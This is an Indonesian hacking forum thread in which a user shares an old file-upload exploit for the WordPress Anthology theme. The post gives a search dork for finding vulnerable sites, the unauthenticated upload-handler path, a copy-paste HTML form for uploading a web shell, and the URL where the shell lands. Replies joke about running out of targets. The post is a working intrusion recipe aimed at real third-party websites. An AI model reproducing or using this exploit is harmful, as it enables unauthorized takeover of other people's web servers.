BackBox Indonesia

Aloo Malam gengs, tengah malam gini masih ada yg idup gak nih ? wkwkw :D
iseng2 share exploit lama, kali aja masih crotz awkakw.
yg dh master minggir dlu beb :heart:

lanjot.

inurl:/wp-content/themes/Anthology/
(sisanya kembangin lagi, gunakan imajinasi vokever kalian, biar bisa dpt yang vuln and verawan).

exploit: /wp-content/themes/Anthology/functions/upload-handler.php

ciri2 vuln o.O ?
muncul error atau blank *kira2 sih gitu, maap kalo salah akwakawk

[Image: a3vN8Ln.png]

Copy Script CSRF Upload nya:

<form enctype="multipart/form-data"
action="target.co.li/wp-content/themes/Anthology/functions/upload-handler.php" method="post">
Please choose a file: <input name="pexetofile" type="file" /><br />
<input type="submit" value="upload" />

</form>

jika sudah buka CSRF Upload nya, lalu upload deh file/shell kalian.
Jika Upload nya sukses nanti akan muncul nama file/shell kalian gengs :3

[Image: TqGjVFQ.png]

Shell Akses: target.co.li/wp-content/uploads/[year]/[month]/namashell.php

[Image: necnt7I.png]

Done x_O

kunjungin blog saya juga ya gengs: TKJ Cyber Art

Sumur

semoga bermanfaat Gengs, maap kalo post cupu :)
waktunya Nue dan tim Katakan Putus cabut dulu gengs, karna bsk masih Ujian Sekolah gengs wkwkwk.
bye ..

komeng ^_^ ~

(03-10-2016, 06:33 PM)anongep Wrote: [ -> ]komeng ^_^ ~

awkawkaw tengkyu :v

Gagal pertamax gan..

(03-11-2016, 02:51 AM)kalong404 Wrote: [ -> ]Gagal pertamax gan..

awkakwkkaw :D

yee si ijo ^_^

kehabisan target kayaknya :v

(03-15-2016, 05:55 AM)cyber173 Wrote: [ -> ]yee si ijo ^_^

tetep setia ama si ijo abang, dan IFC :D awkkaw

(03-27-2016, 05:39 AM)./EL-Mueeza_23 Wrote: [ -> ]kehabisan target kayaknya :v

awkakwwka iya bang akwkaw :D
dh nemu itu doang akwkwa

Nue Bhandell

anongep

Nue Bhandell

kalong404

Nue Bhandell

cyber173

./EL-Mueeza_23

Nue Bhandell